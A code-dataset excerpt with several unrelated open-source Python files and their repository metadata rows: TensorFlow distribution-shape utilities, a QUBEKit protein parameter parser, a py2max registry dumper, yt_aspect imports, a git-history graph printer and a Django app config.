sample_shape batch_shape event_shape
sample_dims batch_dims event_dims
sample_ndims batch_ndims event_ndims
```
for a given `Tensor`, e.g., the result of
`Distribution.sample(sample_shape=...)`.
For a given `Tensor`, this class computes the above table using minimal
information: `batch_ndims` and `event_ndims`.
Examples of `Distribution` `shape` semantics:
- Sample dimensions:
Computing summary statistics, i.e., the average is a reduction over sample
dimensions.
```python
sample_dims = [0]
tf.reduce_mean(Normal(mu=1.3, sigma=1.).sample_n(1000),
reduction_indices=sample_dims) # ~= 1.3
```
- Batch dimensions:
Monte Carlo estimation of a marginal probability:
Average over batch dimensions where batch dimensions are associated with
random draws from a prior.
E.g., suppose we want to find the Monte Carlo estimate of the marginal
distribution of a `Normal` with a random `Laplace` location:
```
P(X=x) = integral P(X=x|y) P(Y=y) dy
~= 1/n sum_{i=1}^n P(X=x|y_i), y_i ~iid Laplace(0,1)
= tf.reduce_mean(Normal(mu=Laplace(0., 1.).sample_n(n=1000),
sigma=tf.ones(1000)).pdf(x),
reduction_indices=batch_dims)
```
The `Laplace` distribution generates a `Tensor` of shape `[1000]`. When
fed to a `Normal`, this is interpreted as 1000 different locations, i.e.,
1000 non-identical Normals. Therefore a single call to `pdf(x)` yields
1000 probabilities, one for every location. The average over this batch
yields the marginal.
- Event dimensions:
Computing the determinant of the Jacobian of a function of a random
variable involves a reduction over event dimensions.
E.g., Jacobian of the transform `Y = g(X) = exp(X)`:
```python
tf.div(1., tf.reduce_prod(x, event_dims))
```
Examples using this class:
Write `S, B, E` for `sample_shape`, `batch_shape`, and `event_shape`.
```python
# 150 iid samples from one multivariate Normal with two degrees of freedom.
mu = [0., 0]
sigma = [[1., 0],
[0, 1]]
mvn = MultivariateNormal(mu, sigma)
rand_mvn = mvn.sample(sample_shape=[3, 50])
shaper = DistributionShape(batch_ndims=0, event_ndims=1)
S, B, E = shaper.get_shape(rand_mvn)
# S = [3, 50]
# B = []
# E = [2]
# 12 iid samples from one Wishart with 2x2 events.
sigma = [[1., 0],
[2, 1]]
wishart = Wishart(df=5, scale=sigma)
rand_wishart = wishart.sample(sample_shape=[3, 4])
shaper = DistributionShape(batch_ndims=0, event_ndims=2)
S, B, E = shaper.get_shape(rand_wishart)
# S = [3, 4]
# B = []
# E = [2, 2]
# 100 iid samples from two, non-identical trivariate Normal distributions.
mu = ... # shape(2, 3)
sigma = ... # shape(2, 3, 3)
X = MultivariateNormal(mu, sigma).sample(shape=[4, 25])
# S = [4, 25]
# B = [2]
# E = [3]
```
Argument Validation:
When `validate_args=False`, checks that cannot be done during
graph construction are performed at graph execution. This may result in a
performance degradation because data must be switched from GPU to CPU.
For example, when `validate_args=False` and `event_ndims` is a
non-constant `Tensor`, it is checked to be a non-negative integer at graph
execution. (Same for `batch_ndims`). Constant `Tensor`s and non-`Tensor`
arguments are always checked for correctness since this can be done for
"free," i.e., during graph construction.
"""
def __init__(self,
batch_ndims=None,
event_ndims=None,
validate_args=False,
name="DistributionShape"):
"""Construct `DistributionShape` with fixed `batch_ndims`, `event_ndims`.
`batch_ndims` and `event_ndims` are fixed throughout the lifetime of a
`Distribution`. They may only be known at graph execution.
If both `batch_ndims` and `event_ndims` are python scalars (rather than
either being a `Tensor`), functions in this class automatically perform
sanity checks during graph construction.
Args:
batch_ndims: `Tensor`. Number of `dims` (`rank`) of the batch portion of
indexes of a `Tensor`. A "batch" is a non-identical distribution, i.e,
Normal with different parameters.
event_ndims: `Tensor`. Number of `dims` (`rank`) of the event portion of
indexes of a `Tensor`. An "event" is what is sampled from a
distribution, i.e., a trivariate Normal has an event shape of [3] and a
4 dimensional Wishart has an event shape of [4, 4].
validate_args: `Boolean`, default `False`. When `True`, non-`tf.constant`
`Tensor` arguments are checked for correctness. (`tf.constant`
arguments are always checked.)
name: `String`. The name prepended to Ops created by this class.
Raises:
ValueError: if either `batch_ndims` or `event_ndims` are: `None`,
negative, not `int32`.
"""
if batch_ndims is None: raise ValueError("batch_ndims cannot be None")
if event_ndims is None: raise ValueError("event_ndims cannot be None")
self._batch_ndims = batch_ndims
self._event_ndims = event_ndims
self._validate_args = validate_args
with ops.name_scope(name) as ns:
self._name = ns
with ops.name_scope("init"):
self._batch_ndims = self._assert_non_negative_int32_scalar(
ops.convert_to_tensor(
batch_ndims, name="batch_ndims"))
self._batch_ndims_static, self._batch_ndims_is_0 = (
self._introspect_ndims(self._batch_ndims))
self._event_ndims = self._assert_non_negative_int32_scalar(
ops.convert_to_tensor(
event_ndims, name="event_ndims"))
self._event_ndims_static, self._event_ndims_is_0 = (
self._introspect_ndims(self._event_ndims))
@property
def name(self):
"""Name given to ops created by this class."""
return self._name
@property
def batch_ndims(self):
"""Returns number of dimensions corresponding to non-identical draws."""
return self._batch_ndims
@property
def event_ndims(self):
"""Returns number of dimensions needed to index a sample's coordinates."""
return self._event_ndims
@property
def validate_args(self):
"""Returns True if graph-runtime `Tensor` checks are enabled."""
return self._validate_args
def get_ndims(self, x, name="get_ndims"):
"""Get `Tensor` number of dimensions (rank).
Args:
x: `Tensor`.
name: `String`. The name to give this op.
Returns:
ndims: Scalar number of dimensions associated with a `Tensor`.
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
ndims = x.get_shape().ndims
if ndims is None:
return array_ops.rank(x, name="ndims")
return ops.convert_to_tensor(ndims, dtype=dtypes.int32, name="ndims")
def get_sample_ndims(self, x, name="get_sample_ndims"):
"""Returns number of dimensions corresponding to iid draws ("sample").
Args:
x: `Tensor`.
name: `String`. The name to give this op.
Returns:
sample_ndims: `Tensor` (0D, `int32`).
Raises:
ValueError: if `sample_ndims` is calculated to be negative.
"""
with self._name_scope(name, values=[x]):
ndims = self.get_ndims(x, name=name)
if self._is_all_constant_helper(ndims, self.batch_ndims,
self.event_ndims):
ndims = tensor_util.constant_value(ndims)
sample_ndims = (ndims - self._batch_ndims_static -
self._event_ndims_static)
if sample_ndims < 0:
raise ValueError(
"expected batch_ndims(%d) + event_ndims(%d) <= ndims(%d)" %
(self._batch_ndims_static, self._event_ndims_static, ndims))
return ops.convert_to_tensor(sample_ndims, name="sample_ndims")
else:
with ops.name_scope(name="sample_ndims"):
sample_ndims = ndims - self.batch_ndims - self.event_ndims
if self.validate_args:
sample_ndims = control_flow_ops.with_dependencies(
[check_ops.assert_non_negative(sample_ndims)], sample_ndims)
return sample_ndims
def get_dims(self, x, name="get_dims"):
"""Returns dimensions indexing `sample_shape`, `batch_shape`, `event_shape`.
Example:
```python
x = ... # Tensor with shape [4, 3, 2, 1]
sample_dims, batch_dims, event_dims = _DistributionShape(
batch_ndims=2, event_ndims=1).get_dims(x)
# sample_dims == [0]
# batch_dims == [1, 2]
# event_dims == [3]
# Note that these are not the shape parts, but rather indexes into shape.
```
Args:
x: `Tensor`.
name: `String`. The name to give this op.
Returns:
sample_dims: `Tensor` (1D, `int32`).
batch_dims: `Tensor` (1D, `int32`).
event_dims: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
def make_dims(start_sum, size, name):
"""Closure to make dims range."""
start_sum = start_sum if start_sum else (
array_ops.zeros((), dtype=dtypes.int32, name="zero"),)
if self._is_all_constant_helper(size, *start_sum):
start = sum(tensor_util.constant_value(s) for s in start_sum)
stop = start + tensor_util.constant_value(size)
return ops.convert_to_tensor(
list(range(start, stop)), dtype=dtypes.int32, name=name)
else:
start = sum(start_sum)
return math_ops.range(start, start + size)
sample_ndims = self.get_sample_ndims(x, name=name)
return (make_dims((), sample_ndims, name="sample_dims"),
make_dims((sample_ndims,), self.batch_ndims, name="batch_dims"),
make_dims((sample_ndims, self.batch_ndims),
self.event_ndims, name="event_dims"))
def get_shape(self, x, name="get_shape"):
"""Returns `Tensor`'s shape partitioned into `sample`, `batch`, `event`.
Args:
x: `Tensor`.
name: `String`. The name to give this op.
Returns:
sample_shape: `Tensor` (1D, `int32`).
batch_shape: `Tensor` (1D, `int32`).
event_shape: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
def slice_shape(start_sum, size, name):
"""Closure to slice out shape."""
start_sum = start_sum if start_sum else (
array_ops.zeros((), dtype=dtypes.int32, name="zero"),)
if (x.get_shape().ndims is not None and
self._is_all_constant_helper(size, *start_sum)):
start = sum(tensor_util.constant_value(s) for s in start_sum)
stop = start + tensor_util.constant_value(size)
slice_ = x.get_shape()[start:stop].as_list()
if all(s is not None for s in slice_):
return ops.convert_to_tensor(slice_, dtype=dtypes.int32, name=name)
# Fall-through intended.
return array_ops.slice(array_ops.shape(x), (sum(start_sum),), (size,))
sample_ndims = self.get_sample_ndims(x, name=name)
return (slice_shape((), sample_ndims,
name="sample_shape"),
slice_shape((sample_ndims,), self.batch_ndims,
name="batch_shape"),
slice_shape((sample_ndims, self.batch_ndims), self.event_ndims,
name="event_shape"))
def make_batch_of_event_sample_matrices(
self, x, name="make_batch_of_event_sample_matrices"):
"""Reshapes/transposes `Distribution` `Tensor` from S+B+E to B_+E_+S_.
Where:
- `B_ = B if B else [1]`,
- `E_ = E if E else [1]`,
- `S_ = [tf.reduce_prod(S)]`.
Args:
x: `Tensor`.
name: `String`. The name to give this op.
Returns:
x: `Tensor`. Input transposed/reshaped to `B_+E_+S_`.
sample_shape: `Tensor` (1D, `int32`).
"""
with self._name_scope(name, values=[x]):
x = ops.convert_to_tensor(x, name="x")
sample_shape, batch_shape, event_shape = self.get_shape(x)
event_shape = distribution_util.pick_vector(
self._event_ndims_is_0, (1,), event_shape)
batch_shape = distribution_util.pick_vector(
self._batch_ndims_is_0, (1,), batch_shape)
new_shape = array_ops.concat(0, ((-1,), batch_shape, event_shape))
x = array_ops.reshape(x, shape=new_shape)
x = distribution_util.rotate_transpose(x, shift=-1)
return x, sample_shape
def undo_make_batch_of_event_sample_matrices(
self, x, sample_shape, name="undo_make_batch_of_event_sample_matrices"):
"""Reshapes/transposes `Distribution` `Tensor` from B_+E_+S_ to S+B+E.
Where:
- `B_ = B if B else [1]`,
- `E_ = E if E else [1]`,
- `S_ = [tf.reduce_prod(S)]`.
This function "reverses" `make_batch_of_event_sample_matrices`.
Args:
x: `Tensor` of shape `B_+E_+S_`.
sample_shape: `Tensor` (1D, `int32`).
name: `String`. The name to give this op.
Returns:
x: `Tensor`. Input transposed/reshaped to `S+B+E`.
"""
with self._name_scope(name, values=[x, sample_shape]):
x = ops.convert_to_tensor(x, name="x")
sample_shape = ops.convert_to_tensor(sample_shape, name="sample_shape")
x = distribution_util.rotate_transpose(x, shift=1)
if self._is_all_constant_helper(self.batch_ndims, self.event_ndims):
if self._batch_ndims_is_0 or self._event_ndims_is_0:
b = ((min(-2, -1 - self._event_ndims_static),)
if self._batch_ndims_is_0 else ())
e = (-1,) if self._event_ndims_is_0 else ()
x = array_ops.squeeze(x, squeeze_dims=b + e)
_, batch_shape, event_shape = self.get_shape(x)
else:
s = (x.get_shape().as_list() if x.get_shape().is_fully_defined()
else array_ops.shape(x))
batch_shape = array_ops.slice(s, (1,), (self.batch_ndims,))
# Since sample_dims=1 and is left-most, we add 1 to the number of
# batch_ndims to get the event start dim.
event_start = array_ops.where(
self._batch_ndims_is_0, 2, 1 + self.batch_ndims)
event_shape = array_ops.slice(s, (event_start,), (self.event_ndims,))
new_shape = array_ops.concat(0, (sample_shape, batch_shape, event_shape))
x = array_ops.reshape(x, shape=new_shape)
return x
@contextlib.contextmanager
def _name_scope(self, name=None, values=None):
"""Helper function to standardize op scope."""
with ops.name_scope(self.name):
with ops.name_scope(name, values=(
(values or []) + [self.batch_ndims, self.event_ndims])) as scope:
yield scope
def _is_all_constant_helper(self, *args):
"""Helper which returns True if all inputs are constant_value."""
return all(tensor_util.constant_value(x) is not None for x in args)
def _assert_non_negative_int32_scalar(self, x):
"""Helper which ensures that input is a non-negative, int32, scalar."""
x = ops.convert_to_tensor(x, name="x")
if x.dtype.base_dtype != dtypes.int32.base_dtype:
raise TypeError("%s.dtype=%s is not %s" % (x.name, x.dtype, dtypes.int32))
x_value_static = tensor_util.constant_value(x)
if x.get_shape().ndims is not None and x_value_static is not None:
if x.get_shape().ndims != 0:
raise ValueError("%s.ndims=%d is not 0 (scalar)" %
(x.name, x.get_shape().ndims))
if x_value_static < 0:
raise ValueError("%s.value=%d cannot be negative" %
(x.name, x_value_static))
return x
if self.validate_args:
x = control_flow_ops.with_dependencies([
check_ops.assert_rank(x, 0),
check_ops.assert_non_negative(x)], x)
return x
def _introspect_ndims(self, ndims):
"""Helper to establish some properties of input ndims args."""
if self._is_all_constant_helper(ndims):
return (tensor_util.constant_value(ndims),
tensor_util.constant_value(ndims) == 0)
return None, math_ops.equal(ndims, 0)
| 40.223404 | 80 | 0.645332 |
795bcdc2d69298c7e5b47a60b5ae84cb4492124d | 6,455 | py | Python | QUBEKit/parametrisation/xml_protein.py | cole-group/QUBEK | 50f8a9c06396f2222a6fe058bf764a6bd7021e38 | [
"MIT"
] | 14 | 2018-10-19T12:32:39.000Z | 2022-01-07T05:06:06.000Z | QUBEKit/parametrisation/xml_protein.py | cole-group/QUBEK | 50f8a9c06396f2222a6fe058bf764a6bd7021e38 | [
"MIT"
] | null | null | null | QUBEKit/parametrisation/xml_protein.py | cole-group/QUBEK | 50f8a9c06396f2222a6fe058bf764a6bd7021e38 | [
"MIT"
] | 6 | 2019-02-26T13:32:58.000Z | 2021-06-01T15:11:27.000Z | #!/usr/bin/env python3
from QUBEKit.parametrisation.base_parametrisation import Parametrisation
from QUBEKit.utils.decorators import for_all_methods, timer_logger
from collections import OrderedDict
from copy import deepcopy
from simtk.openmm import app, XmlSerializer
import xml.etree.ElementTree as ET
@for_all_methods(timer_logger)
class XMLProtein(Parametrisation):
"""Read in the parameters for a proteins from the QUBEKit_general XML file and store them into the proteins."""
def __init__(self, protein, input_file='QUBE_general_pi.xml', fftype='CM1A/OPLS'):
super().__init__(protein, input_file, fftype)
self.xml = self.input_file if self.input_file else f'{self.molecule.name}.xml'
self.serialise_system()
self.gather_parameters()
self.molecule.parameter_engine = f'XML input {self.fftype}'
self.molecule.combination = 'opls'
def serialise_system(self):
"""Serialise the input XML system using openmm."""
pdb = app.PDBFile(f'{self.molecule.name}.pdb')
modeller = app.Modeller(pdb.topology, pdb.positions)
forcefield = app.ForceField(self.xml)
system = forcefield.createSystem(modeller.topology, nonbondedMethod=app.NoCutoff, constraints=None)
xml = XmlSerializer.serializeSystem(system)
with open('serialised.xml', 'w+') as out:
out.write(xml)
def gather_parameters(self):
"""
This method parses the serialised xml file and collects the parameters ready to pass them
to build tree.
"""
# Try to gather the AtomTypes first
for atom in self.molecule.atoms:
self.molecule.AtomTypes[atom.atom_index] = [atom.atom_name, f'QUBE_{atom.atom_index}', atom.atom_name]
input_xml_file = 'serialised.xml'
in_root = ET.parse(input_xml_file).getroot()
# Extract all bond data
for Bond in in_root.iter('Bond'):
self.molecule.HarmonicBondForce[(int(Bond.get('p1')), int(Bond.get('p2')))] = [Bond.get('d'), Bond.get('k')]
# before we continue update the protein class
self.molecule.update()
# Extract all angle data
for Angle in in_root.iter('Angle'):
self.molecule.HarmonicAngleForce[int(Angle.get('p1')), int(Angle.get('p2')), int(Angle.get('p3'))] = [
Angle.get('a'), Angle.get('k')]
# Extract all non-bonded data
i = 0
for Atom in in_root.iter('Particle'):
if "eps" in Atom.attrib:
self.molecule.NonbondedForce[i] = [float(Atom.get('q')), float(Atom.get('sig')), float(Atom.get('eps'))]
self.molecule.atoms[i].partial_charge = float(Atom.get('q'))
i += 1
# Extract all of the torsion data
phases = ['0', '3.141592653589793', '0', '3.141592653589793']
for Torsion in in_root.iter('Torsion'):
tor_string_forward = tuple(int(Torsion.get(f'p{i}')) for i in range(1, 5))
tor_string_back = tuple(reversed(tor_string_forward))
if tor_string_forward not in self.molecule.PeriodicTorsionForce and tor_string_back not in self.molecule.PeriodicTorsionForce:
self.molecule.PeriodicTorsionForce[tor_string_forward] = [
[Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]]]
elif tor_string_forward in self.molecule.PeriodicTorsionForce:
self.molecule.PeriodicTorsionForce[tor_string_forward].append(
[Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])
elif tor_string_back in self.molecule.PeriodicTorsionForce:
self.molecule.PeriodicTorsionForce[tor_string_back].append(
[Torsion.get('periodicity'), Torsion.get('k'), phases[int(Torsion.get('periodicity')) - 1]])
# Now we have all of the torsions from the OpenMM system
# we should check if any torsions we found in the molecule do not have parameters
# if they don't give them the default 0 parameter this will not change the energy
for tor_list in self.molecule.dihedrals.values():
for torsion in tor_list:
# change the indexing to check if they match
if torsion not in self.molecule.PeriodicTorsionForce and tuple(
reversed(torsion)) not in self.molecule.PeriodicTorsionForce:
self.molecule.PeriodicTorsionForce[torsion] = [['1', '0', '0'], ['2', '0', '3.141592653589793'],
['3', '0', '0'], ['4', '0', '3.141592653589793']]
# Now we need to fill in all blank phases of the Torsions
for key, val in self.molecule.PeriodicTorsionForce.items():
vns = ['1', '2', '3', '4']
if len(val) < 4:
# now need to add the missing terms from the torsion force
for force in val:
vns.remove(force[0])
for i in vns:
val.append([i, '0', phases[int(i) - 1]])
# sort by periodicity using lambda function
for force in self.molecule.PeriodicTorsionForce.values():
force.sort(key=lambda x: x[0])
# now we need to tag the proper and improper torsions and reorder them so the first atom is the central
improper_torsions = OrderedDict()
for improper in self.molecule.improper_torsions:
for key, val in self.molecule.PeriodicTorsionForce.items():
# for each improper find the corresponding torsion parameters and save
if sorted(key) == sorted(improper):
# if they match tag the dihedral
self.molecule.PeriodicTorsionForce[key].append('Improper')
# replace the key with the strict improper order first atom is center
improper_torsions[improper] = val
torsions = deepcopy(self.molecule.PeriodicTorsionForce)
# now we should remake the torsion store in the ligand
self.molecule.PeriodicTorsionForce = OrderedDict((v, k) for v, k in torsions.items() if k[-1] != 'Improper')
# now we need to add the impropers at the end of the torsion object
for key, val in improper_torsions.items():
self.molecule.PeriodicTorsionForce[key] = val
| 49.274809 | 138 | 0.630209 |
795bcded1ff62164a683c5d5ecd8c628bb597bb1 | 698 | py | Python | scripts/dump_registry.py | shakfu/py2max | c88c80510ca7ca1bd13314cbf8ccfe57d788fec0 | [
"Unlicense"
] | 1 | 2021-07-24T09:18:19.000Z | 2021-07-24T09:18:19.000Z | scripts/dump_registry.py | shakfu/py2max | c88c80510ca7ca1bd13314cbf8ccfe57d788fec0 | [
"Unlicense"
] | null | null | null | scripts/dump_registry.py | shakfu/py2max | c88c80510ca7ca1bd13314cbf8ccfe57d788fec0 | [
"Unlicense"
] | null | null | null | #!/usr/bin/env python3
import os
import sys
from pathlib import Path
#sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
from py2max import Patcher
from py2max.registry import objects
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def dump_registry(to_folder, size=20):
os.makedirs(to_folder, exist_ok=True)
xs = list(objects.keys())
for i, ys in enumerate(chunks(xs, size)):
p = Patcher(f'{to_folder}/{i}.maxpat')
for j in ys:
p.add_textbox(j)
p.save()
if __name__ == '__main__':
dump_registry(to_folder='outputs/registry', size=20)
| 23.266667 | 63 | 0.648997 |
795bcf198c00bec109c3e24ca768de5c5f32e578 | 286 | py | Python | yt_aspect/__init__.py | chrishavlin/yt_aspect | 01173da347fcef4abf201f2da3c8233b37f23892 | [
"MIT"
] | 1 | 2021-12-10T20:39:13.000Z | 2021-12-10T20:39:13.000Z | yt_aspect/__init__.py | data-exp-lab/yt_aspect | 01173da347fcef4abf201f2da3c8233b37f23892 | [
"MIT"
] | 6 | 2021-09-07T19:54:16.000Z | 2021-09-16T20:18:51.000Z | yt_aspect/__init__.py | chrishavlin/yt_aspect | 01173da347fcef4abf201f2da3c8233b37f23892 | [
"MIT"
] | 1 | 2021-09-15T21:55:57.000Z | 2021-09-15T21:55:57.000Z | from .data_structures import ASPECTDataset # noqa: F401
from .data_structures import ASPECTUnstructuredIndex # noqa: F401
from .data_structures import ASPECTUnstructuredMesh # noqa: F401
from .fields import ASPECTFieldInfo # noqa: F401
from .io import IOHandlerASPECT # noqa: F401
| 47.666667 | 66 | 0.807692 |
795bcf1abe937a74908e4b0036f61b9e21fe175c | 1,695 | py | Python | src/githistorian/graph.py | drachlyznardh/git-historian | f3691c47d26e65aff25f29283ef3b940de0d2697 | [
"MIT"
] | null | null | null | src/githistorian/graph.py | drachlyznardh/git-historian | f3691c47d26e65aff25f29283ef3b940de0d2697 | [
"MIT"
] | 2 | 2018-08-11T09:17:14.000Z | 2018-08-11T09:18:12.000Z | src/githistorian/graph.py | drachlyznardh/git-historian | f3691c47d26e65aff25f29283ef3b940de0d2697 | [
"MIT"
] | null | null | null | # encoding: utf-8
from __future__ import print_function
# Silencing BROKEN PIPE errors
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
from .row import unroll as row_unroll
from .column import unroll as column_unroll
from .layout import Layout
class VisitOrder:
def __init__ (self):
self.content = []
def push (self, arg):
if len(arg) == 0: return
for e in reversed(arg):
self.content.insert(0, e)
def is_empty (self):
return len(self.content) == 0
def has_more (self):
return len(self.content)
def pop (self):
try: return self.content.pop(0)
except: return None
def _bind_children (heads, db):
order = VisitOrder()
order.push(heads)
while order.has_more():
name = order.pop()
commit = db.at(name)
if commit.done: continue
for i in commit.parent:
db.at(i).add_child(name)
order.push(db.skip_if_done(commit.parent))
commit.done = 1
def _print_graph (history, first, width, hflip, vflip):
t = Layout(width + 1, hflip, vflip)
name = first
bigblock = []
while name:
node = history.at(name)
transition, padding = t.compute_layout(node)
block = ['\x1b[m%s\x1b[m %s' % (transition, node.message[0])]
for i in node.message[1:]: block.append('\x1b[m%s\x1b[m %s' % (padding, i))
if vflip: bigblock.append('\n'.join(block))
else: print('\n'.join(block))
name = node.bottom
if vflip:
bigblock.reverse()
print('\n'.join(bigblock))
def deploy (opt, roots, history):
_bind_children(roots, history)
history.clear()
first = row_unroll(roots, history, opt.mingle, opt.flip)
history.clear()
width = column_unroll(roots, history, opt.flip)
_print_graph(history, first, width, opt.hflip, opt.vflip)
| 20.421687 | 77 | 0.692625 |
795bcf64980177bf468906c238b796354923fd42 | 141 | py | Python | passwordmanager/apps.py | percevalm/aumyproject | b24b38005188ce9dd41ed663cf54dad5464afef3 | [
"bzip2-1.0.6"
] | null | null | null | passwordmanager/apps.py | percevalm/aumyproject | b24b38005188ce9dd41ed663cf54dad5464afef3 | [
"bzip2-1.0.6"
] | 16 | 2020-03-24T17:30:37.000Z | 2022-03-11T23:57:41.000Z | passwordmanager/apps.py | percevalm/aumyproject | b24b38005188ce9dd41ed663cf54dad5464afef3 | [
"bzip2-1.0.6"
] | null | null | null | from django.apps import AppConfig
class PasswordmanagerConfig(AppConfig):
name = 'passwordmanager'
verbose_name ='Password Manager' | 23.5 | 39 | 0.780142 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.